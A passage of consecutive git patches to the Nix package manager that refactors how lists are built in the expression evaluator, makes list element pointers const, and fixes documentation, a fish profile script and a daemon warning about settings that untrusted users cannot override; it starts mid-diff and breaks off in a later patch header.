-        (v.listElems()[n] = state.allocValue())->mkApp(args[0], arg);
+        (v = state.allocValue())->mkApp(args[0], arg);
     }
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_genList({
@@ -3355,11 +3369,10 @@ static void prim_sort(EvalState & state, const PosIdx pos, Value * * args, Value
 
     state.forceFunction(*args[0], pos, "while evaluating the first argument passed to builtins.sort");
 
-    state.mkList(v, len);
-    for (unsigned int n = 0; n < len; ++n) {
-        state.forceValue(*args[1]->listElems()[n], pos);
-        v.listElems()[n] = args[1]->listElems()[n];
-    }
+    auto list = state.buildList(len);
+    for (const auto & [n, v] : enumerate(list))
+        state.forceValue(*(v = args[1]->listElems()[n]), pos);
+    v.mkList(list);
 
     auto comparator = [&](Value * a, Value * b) {
         /* Optimization: if the comparator is lessThan, bypass
@@ -3424,17 +3437,17 @@ static void prim_partition(EvalState & state, const PosIdx pos, Value * * args,
 
     auto attrs = state.buildBindings(2);
 
-    auto & vRight = attrs.alloc(state.sRight);
     auto rsize = right.size();
-    state.mkList(vRight, rsize);
+    auto rlist = state.buildList(rsize);
     if (rsize)
-        memcpy(vRight.listElems(), right.data(), sizeof(Value *) * rsize);
+        memcpy(rlist.elems, right.data(), sizeof(Value *) * rsize);
+    attrs.alloc(state.sRight).mkList(rlist);
 
-    auto & vWrong = attrs.alloc(state.sWrong);
     auto wsize = wrong.size();
-    state.mkList(vWrong, wsize);
+    auto wlist = state.buildList(wsize);
     if (wsize)
-        memcpy(vWrong.listElems(), wrong.data(), sizeof(Value *) * wsize);
+        memcpy(wlist.elems, wrong.data(), sizeof(Value *) * wsize);
+    attrs.alloc(state.sWrong).mkList(wlist);
 
     v.mkAttrs(attrs);
 }
@@ -3481,10 +3494,10 @@ static void prim_groupBy(EvalState & state, const PosIdx pos, Value * * args, Va
     auto attrs2 = state.buildBindings(attrs.size());
 
     for (auto & i : attrs) {
-        auto & list = attrs2.alloc(i.first);
         auto size = i.second.size();
-        state.mkList(list, size);
-        memcpy(list.listElems(), i.second.data(), sizeof(Value *) * size);
+        auto list = state.buildList(size);
+        memcpy(list.elems, i.second.data(), sizeof(Value *) * size);
+        attrs2.alloc(i.first).mkList(list);
     }
 
     v.mkAttrs(attrs2.alreadySorted());
@@ -3531,14 +3544,15 @@ static void prim_concatMap(EvalState & state, const PosIdx pos, Value * * args,
         len += lists[n].listSize();
     }
 
-    state.mkList(v, len);
-    auto out = v.listElems();
+    auto list = state.buildList(len);
+    auto out = list.elems;
     for (unsigned int n = 0, pos = 0; n < nrLists; ++n) {
         auto l = lists[n].listSize();
         if (l)
             memcpy(out + pos, lists[n].listElems(), l * sizeof(Value *));
         pos += l;
     }
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_concatMap({
@@ -3986,14 +4000,13 @@ void prim_match(EvalState & state, const PosIdx pos, Value * * args, Value & v)
         }
 
         // the first match is the whole string
-        const size_t len = match.size() - 1;
-        state.mkList(v, len);
-        for (size_t i = 0; i < len; ++i) {
-            if (!match[i+1].matched)
-                (v.listElems()[i] = state.allocValue())->mkNull();
+        auto list = state.buildList(match.size() - 1);
+        for (const auto & [i, v2] : enumerate(list))
+            if (!match[i + 1].matched)
+                (v2 = state.allocValue())->mkNull();
             else
-                (v.listElems()[i] = state.allocValue())->mkString(match[i + 1].str());
-        }
+                (v2 = state.allocValue())->mkString(match[i + 1].str());
+        v.mkList(list);
 
     } catch (std::regex_error & e) {
         if (e.code() == std::regex_constants::error_space) {
@@ -4062,11 +4075,12 @@ void prim_split(EvalState & state, const PosIdx pos, Value * * args, Value & v)
 
         // Any matches results are surrounded by non-matching results.
         const size_t len = std::distance(begin, end);
-        state.mkList(v, 2 * len + 1);
+        auto list = state.buildList(2 * len + 1);
         size_t idx = 0;
 
         if (len == 0) {
-            v.listElems()[idx++] = args[1];
+            list[0] = args[1];
+            v.mkList(list);
             return;
         }
 
@@ -4075,28 +4089,31 @@ void prim_split(EvalState & state, const PosIdx pos, Value * * args, Value & v)
             auto match = *i;
 
             // Add a string for non-matched characters.
-            (v.listElems()[idx++] = state.allocValue())->mkString(match.prefix().str());
+            (list[idx++] = state.allocValue())->mkString(match.prefix().str());
 
             // Add a list for matched substrings.
             const size_t slen = match.size() - 1;
-            auto elem = v.listElems()[idx++] = state.allocValue();
 
             // Start at 1, beacause the first match is the whole string.
-            state.mkList(*elem, slen);
-            for (size_t si = 0; si < slen; ++si) {
+            auto list2 = state.buildList(slen);
+            for (const auto & [si, v2] : enumerate(list2)) {
                 if (!match[si + 1].matched)
-                    (elem->listElems()[si] = state.allocValue())->mkNull();
+                    v2 = &state.vNull;
                 else
-                    (elem->listElems()[si] = state.allocValue())->mkString(match[si + 1].str());
+                    (v2 = state.allocValue())->mkString(match[si + 1].str());
             }
 
+            (list[idx++] = state.allocValue())->mkList(list2);
+
             // Add a string for non-matched suffix characters.
             if (idx == 2 * len)
-                (v.listElems()[idx++] = state.allocValue())->mkString(match.suffix().str());
+                (list[idx++] = state.allocValue())->mkString(match.suffix().str());
         }
 
         assert(idx == 2 * len + 1);
 
+        v.mkList(list);
+
     } catch (std::regex_error & e) {
         if (e.code() == std::regex_constants::error_space) {
             // limit is _GLIBCXX_REGEX_STATE_LIMIT for libstdc++
@@ -4316,9 +4333,10 @@ static void prim_splitVersion(EvalState & state, const PosIdx pos, Value * * arg
             break;
         components.emplace_back(component);
     }
-    state.mkList(v, components.size());
+    auto list = state.buildList(components.size());
     for (const auto & [n, component] : enumerate(components))
-        (v.listElems()[n] = state.allocValue())->mkString(std::move(component));
+        (list[n] = state.allocValue())->mkString(std::move(component));
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_splitVersion({
@@ -4559,14 +4577,14 @@ void EvalState::createBaseEnv()
     });
 
     /* Add a value containing the current Nix expression search path. */
-    mkList(v, searchPath.elements.size());
-    int n = 0;
-    for (auto & i : searchPath.elements) {
+    auto list = buildList(searchPath.elements.size());
+    for (const auto & [n, i] : enumerate(searchPath.elements)) {
         auto attrs = buildBindings(2);
         attrs.alloc("path").mkString(i.path.s);
         attrs.alloc("prefix").mkString(i.prefix.s);
-        (v.listElems()[n++] = allocValue())->mkAttrs(attrs);
+        (list[n] = allocValue())->mkAttrs(attrs);
     }
+    v.mkList(list);
     addConstant("__nixPath", v, {
         .type = nList,
         .doc = R"(
diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc
index 1eec8b316..4d000b2ce 100644
--- a/src/libexpr/primops/context.cc
+++ b/src/libexpr/primops/context.cc
@@ -207,10 +207,10 @@ static void prim_getContext(EvalState & state, const PosIdx pos, Value * * args,
         if (info.second.allOutputs)
             infoAttrs.alloc(sAllOutputs).mkBool(true);
         if (!info.second.outputs.empty()) {
-            auto & outputsVal = infoAttrs.alloc(state.sOutputs);
-            state.mkList(outputsVal, info.second.outputs.size());
+            auto list = state.buildList(info.second.outputs.size());
             for (const auto & [i, output] : enumerate(info.second.outputs))
-                (outputsVal.listElems()[i] = state.allocValue())->mkString(output);
+                (list[i] = state.allocValue())->mkString(output);
+            infoAttrs.alloc(state.sOutputs).mkList(list);
         }
         attrs.alloc(state.store->printStorePath(info.first)).mkAttrs(infoAttrs);
     }
diff --git a/src/libexpr/primops/fromTOML.cc b/src/libexpr/primops/fromTOML.cc
index 94be7960a..9bee8ca38 100644
--- a/src/libexpr/primops/fromTOML.cc
+++ b/src/libexpr/primops/fromTOML.cc
@@ -38,10 +38,10 @@ static void prim_fromTOML(EvalState & state, const PosIdx pos, Value * * args, V
                 {
                     auto array = toml::get>(t);
 
-                    size_t size = array.size();
-                    state.mkList(v, size);
-                    for (size_t i = 0; i < size; ++i)
-                        visit(*(v.listElems()[i] = state.allocValue()), array[i]);
+                    auto list = state.buildList(array.size());
+                    for (const auto & [n, v] : enumerate(list))
+                        visit(*(v = state.allocValue()), array[n]);
+                    v.mkList(list);
                 }
                 break;;
             case toml::value_t::boolean:
diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh
index e7aea4949..9f0600efb 100644
--- a/src/libexpr/value.hh
+++ b/src/libexpr/value.hh
@@ -18,6 +18,7 @@
 
 namespace nix {
 
+struct Value;
 class BindingsBuilder;
 
 
@@ -134,6 +135,34 @@ class ExternalValueBase
 std::ostream & operator << (std::ostream & str, const ExternalValueBase & v);
 
 
+class ListBuilder
+{
+    const size_t size;
+    Value * inlineElems[2] = {nullptr, nullptr};
+public:
+    Value * * elems;
+    ListBuilder(EvalState & state, size_t size);
+
+    ListBuilder(ListBuilder && x)
+        : size(x.size)
+        , inlineElems{x.inlineElems[0], x.inlineElems[1]}
+        , elems(size <= 2 ? inlineElems : x.elems)
+    { }
+
+    Value * & operator [](size_t n)
+    {
+        return elems[n];
+    }
+
+    typedef Value * * iterator;
+
+    iterator begin() { return &elems[0]; }
+    iterator end() { return &elems[size]; }
+
+    friend class Value;
+};
+
+
 struct Value
 {
 private:
@@ -323,16 +352,20 @@ public:
 
     Value & mkAttrs(BindingsBuilder & bindings);
 
-    inline void mkList(size_t size)
+    void mkList(const ListBuilder & builder)
     {
         clearValue();
-        if (size == 1)
+        if (builder.size == 1) {
+            smallList[0] = builder.inlineElems[0];
             internalType = tList1;
-        else if (size == 2)
+        } else if (builder.size == 2) {
+            smallList[0] = builder.inlineElems[0];
+            smallList[1] = builder.inlineElems[1];
             internalType = tList2;
-        else {
+        } else {
+            bigList.size = builder.size;
+            bigList.elems = builder.elems;
             internalType = tListN;
-            bigList.size = size;
         }
     }
 
diff --git a/src/nix-env/nix-env.cc b/src/nix-env/nix-env.cc
index 5e3de20c5..f79755375 100644
--- a/src/nix-env/nix-env.cc
+++ b/src/nix-env/nix-env.cc
@@ -172,7 +172,7 @@ static void loadSourceExpr(EvalState & state, const SourcePath & path, Value & v
        directory). */
     else if (st.type == InputAccessor::tDirectory) {
         auto attrs = state.buildBindings(maxAttrs);
-        state.mkList(attrs.alloc("_combineChannels"), 0);
+        attrs.insert(state.symbols.create("_combineChannels"), &state.vEmptyList);
         StringSet seen;
         getAllExprs(state, path, seen, attrs);
         v.mkAttrs(attrs);
diff --git a/src/nix-env/user-env.cc b/src/nix-env/user-env.cc
index 8bebe2b9e..dd27344aa 100644
--- a/src/nix-env/user-env.cc
+++ b/src/nix-env/user-env.cc
@@ -49,10 +49,8 @@ bool createUserEnv(EvalState & state, PackageInfos & elems,
 
     /* Construct the whole top level derivation. */
     StorePathSet references;
-    Value manifest;
-    state.mkList(manifest, elems.size());
-    size_t n = 0;
-    for (auto & i : elems) {
+    auto list = state.buildList(elems.size());
+    for (const auto & [n, i] : enumerate(elems)) {
         /* Create a pseudo-derivation containing the name, system,
            output paths, and optionally the derivation path, as well
            as the meta attributes. */
@@ -72,10 +70,9 @@ bool createUserEnv(EvalState & state, PackageInfos & elems,
             attrs.alloc(state.sDrvPath).mkString(state.store->printStorePath(*drvPath));
 
         // Copy each output meant for installation.
-        auto & vOutputs = attrs.alloc(state.sOutputs);
-        state.mkList(vOutputs, outputs.size());
+        auto outputsList = state.buildList(outputs.size());
         for (const auto & [m, j] : enumerate(outputs)) {
-            (vOutputs.listElems()[m] = state.allocValue())->mkString(j.first);
+            (outputsList[m] = state.allocValue())->mkString(j.first);
             auto outputAttrs = state.buildBindings(2);
             outputAttrs.alloc(state.sOutPath).mkString(state.store->printStorePath(*j.second));
             attrs.alloc(j.first).mkAttrs(outputAttrs);
@@ -87,6 +84,7 @@ bool createUserEnv(EvalState & state, PackageInfos & elems,
 
             references.insert(*j.second);
         }
+        attrs.alloc(state.sOutputs).mkList(outputsList);
 
         // Copy the meta attributes.
         auto meta = state.buildBindings(metaNames.size());
@@ -98,11 +96,14 @@ bool createUserEnv(EvalState & state, PackageInfos & elems,
 
         attrs.alloc(state.sMeta).mkAttrs(meta);
 
-        (manifest.listElems()[n++] = state.allocValue())->mkAttrs(attrs);
+        (list[n] = state.allocValue())->mkAttrs(attrs);
 
         if (drvPath) references.insert(*drvPath);
     }
 
+    Value manifest;
+    manifest.mkList(list);
+
     /* Also write a copy of the list of user environment elements to
        the store; we need it for future modifications of the
        environment. */
diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc
index d2d699a64..43b545035 100644
--- a/tests/unit/libexpr/value/print.cc
+++ b/tests/unit/libexpr/value/print.cc
@@ -79,11 +79,11 @@ TEST_F(ValuePrintingTests, tList)
     Value vTwo;
     vTwo.mkInt(2);
 
+    auto list = state.buildList(3);
+    list.elems[0] = &vOne;
+    list.elems[1] = &vTwo;
     Value vList;
-    state.mkList(vList, 5);
-    vList.bigList.elems[0] = &vOne;
-    vList.bigList.elems[1] = &vTwo;
-    vList.bigList.size = 3;
+    vList.mkList(list);
 
     test(vList, "[ 1 2 «nullptr» ]");
 }
@@ -249,12 +249,12 @@ TEST_F(ValuePrintingTests, depthList)
     Value vNested;
     vNested.mkAttrs(builder2.finish());
 
+    auto list = state.buildList(3);
+    list.elems[0] = &vOne;
+    list.elems[1] = &vTwo;
+    list.elems[2] = &vNested;
     Value vList;
-    state.mkList(vList, 5);
-    vList.bigList.elems[0] = &vOne;
-    vList.bigList.elems[1] = &vTwo;
-    vList.bigList.elems[2] = &vNested;
-    vList.bigList.size = 3;
+    vList.mkList(list);
 
     test(vList, "[ 1 2 { ... } ]", PrintOptions { .maxDepth = 1 });
     test(vList, "[ 1 2 { nested = { ... }; one = 1; two = 2; } ]", PrintOptions { .maxDepth = 2 });
@@ -539,11 +539,11 @@ TEST_F(ValuePrintingTests, ansiColorsList)
     Value vTwo;
     vTwo.mkInt(2);
 
+    auto list = state.buildList(3);
+    list.elems[0] = &vOne;
+    list.elems[1] = &vTwo;
     Value vList;
-    state.mkList(vList, 5);
-    vList.bigList.elems[0] = &vOne;
-    vList.bigList.elems[1] = &vTwo;
-    vList.bigList.size = 3;
+    vList.mkList(list);
 
     test(vList,
          "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_CYAN "2" ANSI_NORMAL " " ANSI_MAGENTA "«nullptr»" ANSI_NORMAL " ]",
@@ -670,11 +670,11 @@ TEST_F(ValuePrintingTests, ansiColorsListRepeated)
     Value vEmpty;
     vEmpty.mkAttrs(emptyBuilder.finish());
 
+    auto list = state.buildList(2);
+    list.elems[0] = &vEmpty;
+    list.elems[1] = &vEmpty;
     Value vList;
-    state.mkList(vList, 3);
-    vList.bigList.elems[0] = &vEmpty;
-    vList.bigList.elems[1] = &vEmpty;
-    vList.bigList.size = 2;
+    vList.mkList(list);
 
     test(vList,
          "[ { } " ANSI_MAGENTA "«repeated»" ANSI_NORMAL " ]",
@@ -690,11 +690,11 @@ TEST_F(ValuePrintingTests, listRepeated)
     Value vEmpty;
     vEmpty.mkAttrs(emptyBuilder.finish());
 
+    auto list = state.buildList(2);
+    list.elems[0] = &vEmpty;
+    list.elems[1] = &vEmpty;
     Value vList;
-    state.mkList(vList, 3);
-    vList.bigList.elems[0] = &vEmpty;
-    vList.bigList.elems[1] = &vEmpty;
-    vList.bigList.size = 2;
+    vList.mkList(list);
 
     test(vList, "[ { } «repeated» ]", PrintOptions { });
     test(vList,
@@ -750,11 +750,12 @@ TEST_F(ValuePrintingTests, ansiColorsListElided)
     Value vTwo;
     vTwo.mkInt(2);
 
+    {
+    auto list = state.buildList(2);
+    list.elems[0] = &vOne;
+    list.elems[1] = &vTwo;
     Value vList;
-    state.mkList(vList, 4);
-    vList.bigList.elems[0] = &vOne;
-    vList.bigList.elems[1] = &vTwo;
-    vList.bigList.size = 2;
+    vList.mkList(list);
 
     test(vList,
          "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«1 item elided»" ANSI_NORMAL " ]",
@@ -762,12 +763,18 @@ TEST_F(ValuePrintingTests, ansiColorsListElided)
              .ansiColors = true,
              .maxListItems = 1
          });
+    }
 
     Value vThree;
     vThree.mkInt(3);
 
-    vList.bigList.elems[2] = &vThree;
-    vList.bigList.size = 3;
+    {
+    auto list = state.buildList(3);
+    list.elems[0] = &vOne;
+    list.elems[1] = &vTwo;
+    list.elems[2] = &vThree;
+    Value vList;
+    vList.mkList(list);
 
     test(vList,
          "[ " ANSI_CYAN "1" ANSI_NORMAL " " ANSI_FAINT "«2 items elided»" ANSI_NORMAL " ]",
@@ -775,6 +782,7 @@ TEST_F(ValuePrintingTests, ansiColorsListElided)
              .ansiColors = true,
              .maxListItems = 1
          });
+    }
 }
 
 } // namespace nix

From 3e6730ee62b10acff12e7dd66e1269d7a9da7a21 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 15 Mar 2024 18:22:39 +0100
Subject: [PATCH 628/654] Mark Value pointers in Value::elems as const

This catches modification of finalized values (e.g. in prim_sort).
---
 src/libexpr/eval.cc    | 2 +-
 src/libexpr/eval.hh    | 2 +-
 src/libexpr/primops.cc | 5 +++--
 src/libexpr/value.hh   | 4 ++--
 4 files changed, 7 insertions(+), 6 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 297832818..fb4cfdccf 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -1946,7 +1946,7 @@ void ExprOpConcatLists::eval(EvalState & state, Env & env, Value & v)
 }
 
 
-void EvalState::concatLists(Value & v, size_t nrLists, Value * * lists, const PosIdx pos, std::string_view errorCtx)
+void EvalState::concatLists(Value & v, size_t nrLists, Value * const * lists, const PosIdx pos, std::string_view errorCtx)
 {
     nrListConcats++;
 
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 4a271f4ef..7db911fce 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -671,7 +671,7 @@ public:
         const SingleDerivedPath & p,
         Value & v);
 
-    void concatLists(Value & v, size_t nrLists, Value * * lists, const PosIdx pos, std::string_view errorCtx);
+    void concatLists(Value & v, size_t nrLists, Value * const * lists, const PosIdx pos, std::string_view errorCtx);
 
     /**
      * Print statistics, if enabled.
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 32913d72e..9449a8f7c 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -3372,7 +3372,6 @@ static void prim_sort(EvalState & state, const PosIdx pos, Value * * args, Value
     auto list = state.buildList(len);
     for (const auto & [n, v] : enumerate(list))
         state.forceValue(*(v = args[1]->listElems()[n]), pos);
-    v.mkList(list);
 
     auto comparator = [&](Value * a, Value * b) {
         /* Optimization: if the comparator is lessThan, bypass
@@ -3391,7 +3390,9 @@ static void prim_sort(EvalState & state, const PosIdx pos, Value * * args, Value
     /* FIXME: std::sort can segfault if the comparator is not a strict
        weak ordering. What to do? std::stable_sort() seems more
        resilient, but no guarantees... */
-    std::stable_sort(v.listElems(), v.listElems() + len, comparator);
+    std::stable_sort(list.begin(), list.end(), comparator);
+
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_sort({
diff --git a/src/libexpr/value.hh b/src/libexpr/value.hh
index 9f0600efb..885621cf5 100644
--- a/src/libexpr/value.hh
+++ b/src/libexpr/value.hh
@@ -246,7 +246,7 @@ public:
         Bindings * attrs;
         struct {
             size_t size;
-            Value * * elems;
+            Value * const * elems;
         } bigList;
         Value * smallList[2];
         ClosureThunk thunk;
@@ -425,7 +425,7 @@ public:
         return internalType == tList1 || internalType == tList2 || internalType == tListN;
     }
 
-    Value * * listElems()
+    Value * const * listElems()
     {
         return internalType == tList1 || internalType == tList2 ? smallList : bigList.elems;
     }

From 39b0b8452f79e710b65b363663491fc17bb04a25 Mon Sep 17 00:00:00 2001
From: Yueh-Shun Li 
Date: Sun, 17 Mar 2024 06:13:14 +0800
Subject: [PATCH 629/654] doc: builtins.addDrvOutputDependencies: fix link
 target

---
 src/libexpr/primops/context.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc
index 88502fe2d..f5444b44a 100644
--- a/src/libexpr/primops/context.cc
+++ b/src/libexpr/primops/context.cc
@@ -144,7 +144,7 @@ static RegisterPrimOp primop_addDrvOutputDependencies({
       The original string context element must not be empty or have multiple elements, and it must not have any other type of element other than a constant or derivation deep element.
       The latter is supported so this function is idempotent.
 
-      This is the opposite of [`builtins.unsafeDiscardOutputDependency`](#builtins-addDrvOutputDependencies).
+      This is the opposite of [`builtins.unsafeDiscardOutputDependency`](#builtins-unsafeDiscardOutputDependency).
     )",
     .fun = prim_addDrvOutputDependencies
 });

From d2b512959c00e487c4858a6c4bd53dc9db0bf0d6 Mon Sep 17 00:00:00 2001
From: Yueh-Shun Li 
Date: Mon, 18 Mar 2024 02:38:31 +0800
Subject: [PATCH 630/654] builtins.addDrvOutputDependencies: fix commentary

---
 src/libexpr/primops/context.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc
index f5444b44a..27a454b27 100644
--- a/src/libexpr/primops/context.cc
+++ b/src/libexpr/primops/context.cc
@@ -246,7 +246,7 @@ static RegisterPrimOp primop_getContext({
 
 /* Append the given context to a given string.
 
-   See the commentary above unsafeGetContext for details of the
+   See the commentary above getContext for details of the
    context representation.
 */
 static void prim_appendContext(EvalState & state, const PosIdx pos, Value * * args, Value & v)

From ad217ddbbc759f1b67bf1368032f364ee483b790 Mon Sep 17 00:00:00 2001
From: lelgenio 
Date: Mon, 18 Mar 2024 16:23:17 -0300
Subject: [PATCH 631/654] Document builtins.storePath being disabled by
 pure-eval

---
 src/libexpr/eval-settings.hh | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh
index c5581b9ff..60d3a6f25 100644
--- a/src/libexpr/eval-settings.hh
+++ b/src/libexpr/eval-settings.hh
@@ -76,9 +76,10 @@ struct EvalSettings : Config
 
           - Restrict file system and network access to files specified by cryptographic hash
           - Disable impure constants:
-            - [`bultins.currentSystem`](@docroot@/language/builtin-constants.md#builtins-currentSystem)
+            - [`builtins.currentSystem`](@docroot@/language/builtin-constants.md#builtins-currentSystem)
             - [`builtins.currentTime`](@docroot@/language/builtin-constants.md#builtins-currentTime)
             - [`builtins.nixPath`](@docroot@/language/builtin-constants.md#builtins-nixPath)
+            - [`builtins.storePath`](@docroot@/language/builtin-constants.md#builtins-storePath)
         )"
         };
 

From a5262fb880826d278477b77a595b571559476030 Mon Sep 17 00:00:00 2001
From: Jonathan Ringer 
Date: Tue, 19 Mar 2024 17:37:04 -0700
Subject: [PATCH 632/654] Document how to build many outputs of a flake package

---
 src/nix/build.md | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/src/nix/build.md b/src/nix/build.md
index 0fbb39cc3..4c6f6049f 100644
--- a/src/nix/build.md
+++ b/src/nix/build.md
@@ -40,6 +40,18 @@ R""(
   lrwxrwxrwx 1 … ./result-dev -> /nix/store/dkm3gwl0xrx0wrw6zi5x3px3lpgjhlw4-glibc-2.32-dev
   ```
 
+* Build all outputs:
+
+  ```console
+  # nix build nixpkgs#openssl^* --print-out-paths
+  /nix/store/gvad6v0cmq1qccmc4wphsazqbj0xzjsl-openssl-3.0.13-bin
+  /nix/store/a07jqdrc8afnk8r6f3lnhh4gvab7chk4-openssl-3.0.13-debug
+  /nix/store/yg75achq89wgqn2fi3gglgsd77kjpi03-openssl-3.0.13-dev
+  /nix/store/bvdcihi8c88fw31cg6gzzmpnwglpn1jv-openssl-3.0.13-doc
+  /nix/store/gjqcvq47cmxazxga0cirspm3jywkmvfv-openssl-3.0.13-man
+  /nix/store/7nmrrad8skxr47f9hfl3xc0pfqmwq51b-openssl-3.0.13
+  ```
+
 * Build attribute `build.x86_64-linux` from (non-flake) Nix expression
   `release.nix`:
 

From c448636f7c8b50d3d41085bb72e5f608ac1344c1 Mon Sep 17 00:00:00 2001
From: Jesse Schalken 
Date: Wed, 20 Mar 2024 15:23:31 +1100
Subject: [PATCH 633/654] Fix loop over $NIX_PROFILES in
 nix-profile-daemon.fish.in

---
 scripts/nix-profile-daemon.fish.in | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/scripts/nix-profile-daemon.fish.in b/scripts/nix-profile-daemon.fish.in
index c23aa64f0..346dce5dd 100644
--- a/scripts/nix-profile-daemon.fish.in
+++ b/scripts/nix-profile-daemon.fish.in
@@ -28,7 +28,7 @@ else
 end
 
 # Set $NIX_SSL_CERT_FILE so that Nixpkgs applications like curl work.
-if test -n "$NIX_SSH_CERT_FILE"
+if test -n "$NIX_SSL_CERT_FILE"
   : # Allow users to override the NIX_SSL_CERT_FILE
 else if test -e /etc/ssl/certs/ca-certificates.crt # NixOS, Ubuntu, Debian, Gentoo, Arch
   set --export NIX_SSL_CERT_FILE /etc/ssl/certs/ca-certificates.crt
@@ -44,7 +44,7 @@ else if test -e "$NIX_LINK/etc/ca-bundle.crt" # old cacert in Nix profile
   set --export NIX_SSL_CERT_FILE "$NIX_LINK/etc/ca-bundle.crt"
 else
   # Fall back to what is in the nix profiles, favouring whatever is defined last.
-  for i in $NIX_PROFILES
+  for i in (string split ' ' $NIX_PROFILES)
     if test -e "$i/etc/ssl/certs/ca-bundle.crt"
       set --export NIX_SSL_CERT_FILE "$i/etc/ssl/certs/ca-bundle.crt"
     end

From 40a7929c8e221e6096c3edd2dd0af948a29e3141 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?F=C3=A9lix=20Baylac-Jacqu=C3=A9?= 
Date: Sat, 8 Jun 2019 00:41:19 +0200
Subject: [PATCH 634/654] Daemon: warn when an untrusted user cannot override a
 setting

In a daemon-based Nix setup, some options cannot be overridden by a
client unless the client's user is considered trusted.

Currently, if an untrusted user tries to override one of those
options, we are silently ignoring it.

This can be pretty confusing in certain situations.

e.g. a user thinks he disabled the sandbox when in reality he did not.

We are now sending a warning message letting know the user some options
have been ignored.

Related to #1761.

This is a cherry-pick of 9e0f5f803f6cbfe9925cef69a0e58cbf5375bfaf.
The above commit has been reverted by
a59e77d9e54e8e7bf0f3c3f40c22cd34b7a81225 to prevent spamming warnings
with experimental features, but these are now totally ignored on the
daemon side, so there's no reason for the revert any more.
---
 src/libstore/daemon.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index 917813342..2c808015d 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -254,7 +254,7 @@ struct ClientSettings
                 else if (setSubstituters(settings.substituters))
                     ;
                 else
-                    debug("ignoring the client-specified setting '%s', because it is a restricted setting and you are not a trusted user", name);
+                    warn("ignoring the client-specified setting '%s', because it is a restricted setting and you are not a trusted user", name);
             } catch (UsageError & e) {
                 warn(e.what());
             }

From 0b08dd45b03afd5161966893e42080bf130f527c Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 21:28:38 +0100
Subject: [PATCH 635/654] prim_match: Use state.vNull

---
 src/libexpr/primops.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 9449a8f7c..2cb78e35f 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -4004,7 +4004,7 @@ void prim_match(EvalState & state, const PosIdx pos, Value * * args, Value & v)
         auto list = state.buildList(match.size() - 1);
         for (const auto & [i, v2] : enumerate(list))
             if (!match[i + 1].matched)
-                (v2 = state.allocValue())->mkNull();
+                v2 = &state.vNull;
             else
                 (v2 = state.allocValue())->mkString(match[i + 1].str());
         v.mkList(list);

From d4b0b7f15280659424acc1109679bda7dae11e92 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 21:34:23 +0100
Subject: [PATCH 636/654] createBaseEnv: Use state.vNull

---
 src/libexpr/primops.cc | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 2cb78e35f..61a11b226 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -4430,8 +4430,7 @@ void EvalState::createBaseEnv()
         )",
     });
 
-    v.mkNull();
-    addConstant("null", v, {
+    addConstant("null", &vNull, {
         .type = nNull,
         .doc = R"(
           Primitive value.

From 4c8a33ce468ae7b369368e6a26a3180030262f23 Mon Sep 17 00:00:00 2001
From: Jonathan Ringer 
Date: Wed, 20 Mar 2024 14:42:44 -0700
Subject: [PATCH 637/654] Update src/nix/build.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Théophane Hufschmitt <7226587+thufschmitt@users.noreply.github.com>
---
 src/nix/build.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/nix/build.md b/src/nix/build.md
index 4c6f6049f..5dfdd44a7 100644
--- a/src/nix/build.md
+++ b/src/nix/build.md
@@ -43,7 +43,7 @@ R""(
 * Build all outputs:
 
   ```console
-  # nix build nixpkgs#openssl^* --print-out-paths
+  # nix build "nixpkgs#openssl^*" --print-out-paths
   /nix/store/gvad6v0cmq1qccmc4wphsazqbj0xzjsl-openssl-3.0.13-bin
   /nix/store/a07jqdrc8afnk8r6f3lnhh4gvab7chk4-openssl-3.0.13-debug
   /nix/store/yg75achq89wgqn2fi3gglgsd77kjpi03-openssl-3.0.13-dev

From d71e74838aade579f9e5e2771ba26b7077398e93 Mon Sep 17 00:00:00 2001
From: Robert Hensing 
Date: Wed, 20 Mar 2024 22:56:42 +0100
Subject: [PATCH 638/654] readDir: Allocate type strings only once

---
 src/libexpr/eval.cc    |  4 ++++
 src/libexpr/eval.hh    |  9 +++++++++
 src/libexpr/primops.cc | 21 +++++++++------------
